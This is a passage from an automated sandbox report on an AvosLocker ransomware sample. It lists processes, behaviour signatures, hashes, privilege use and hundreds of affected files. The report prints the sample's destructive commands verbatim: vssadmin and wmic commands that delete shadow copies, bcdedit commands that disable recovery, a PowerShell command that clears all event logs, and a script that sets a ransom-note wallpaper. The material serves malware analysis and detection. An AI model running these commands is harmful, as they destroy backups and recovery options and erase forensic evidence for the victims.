PID 2088 wrote to memory of 1676 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1676 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\system32\cmd.exe
PID 1048 wrote to memory of 1324 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 1048 wrote to memory of 1324 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 1048 wrote to memory of 1324 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 1912 wrote to memory of 1044 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 1912 wrote to memory of 1044 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 1912 wrote to memory of 1044 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 1788 wrote to memory of 4080 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 1788 wrote to memory of 4080 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 1788 wrote to memory of 4080 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 1804 wrote to memory of 4736 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 1804 wrote to memory of 4736 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 1804 wrote to memory of 4736 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 1676 wrote to memory of 4276 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 4276 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 4276 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 4492 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 4492 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 4492 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 4492 | N/A | C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 1948 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 4492 wrote to memory of 1948 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 4492 wrote to memory of 1948 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 4492 wrote to memory of 4200 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\rundll32.exe
PID 4492 wrote to memory of 4200 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\rundll32.exe
PID 4492 wrote to memory of 4200 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe

"C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe"

C:\Windows\system32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\system32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"Z:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2090100087.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

N/A

Files

\Device\HarddiskVolume1\GET_YOUR_FILES_BACK.txt

MD5 b69a0aa7abf916a5f00d0f438cf98fa6
SHA1 1ad8aec6b066487d69492225bb6493b4afd2db64
SHA256 9a3b665f5458ade3c61be4fd2f906a915f8c523127be7456a6bff3677356289d
SHA512 cec0c8f59d7c204f33452223b0f9eaa55bc0ef07f983c42fbdd3ff0906814bf907816bd6b4dd2dbb3292f6396f22b50b0736caf469f1a942fdd7cd09c099cd72

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f105965aec4e6b6aa30275c5167567b9
SHA1 d8fe2af6a47b1f576cae7c834a0e4b3f5a5544df
SHA256 8af8a9fc2772d9233f7162e1aef44cc6e7654667500cbc8c24c6e1eebf8c7a77
SHA512 a2c430e6c0513240929143406e7cd3eea05d9ef54f76b43af6112aaad5b2b413ac14e598f393ef89f62e8367f6932894d0fc87f5c9750f7f3fee8eed82103d98

C:\Users\Admin\AppData\Local\Temp\2090100087.png

MD5 22a90a703f3150597c9be76ffafa5136
SHA1 bff44186563afeccda1406b17401de052c2a3366
SHA256 eab4c9e752548c3a53887993ae66891861a376210ee363e49b4bb29d97d91b7d
SHA512 8bf44a4baa4b19961143e90ddbd02faa1ff321a8742e6ebefd776d7a09d4a8e4aca2b6a6157bba1905f51de54bcfba6ffdfbae71377a6be4bce65332b0b3fa33

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-29 07:08

Reported

2024-05-29 07:10

Platform

win10v2004-20240426-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (8462) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6581503.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Java\jdk-1.8\include\win32\bridge\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\eu\msipc.dll.mui C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\cursors.properties C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL010.XML C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest4-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Advanced-Light.scale-100.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\uk\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\shaded.dotx C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_OEM_Perp-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_KMS_ClientC2R-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\SubsetList\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fi-fi\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-20_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Slipstream.xml C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files\Common Files\System\ado\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ko-kr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\main-selector.css C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Generic-Light.scale-125.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-si\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ms_get.svg C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pt-br\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\it-it\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Yahoo-Light.scale-150.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\fre\StartMenu_Win10_RTL.mp4 C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\it-IT\MSFT_PackageManagement.strings.psd1 C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\ja-JP\wmpnssci.dll.mui C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\LinkedInboxMediumTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcR_OEM_Perp-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\THIRDPARTYLICENSEREADME.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Common Files\System\ja-JP\wab32res.dll.mui C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Windows Media Player\Icons\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hu-hu\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\manifest.xml C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\identity_proxy\identity_helper.Sparse.Canary.msix.DATA C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-16_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-60.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Google.scale-300.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Trial-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\lib\jvm.lib C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ro-ro\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols.xml C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteFreeR_Bypass-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tt.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailMediumTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Graph.exe.manifest C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\ui-strings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
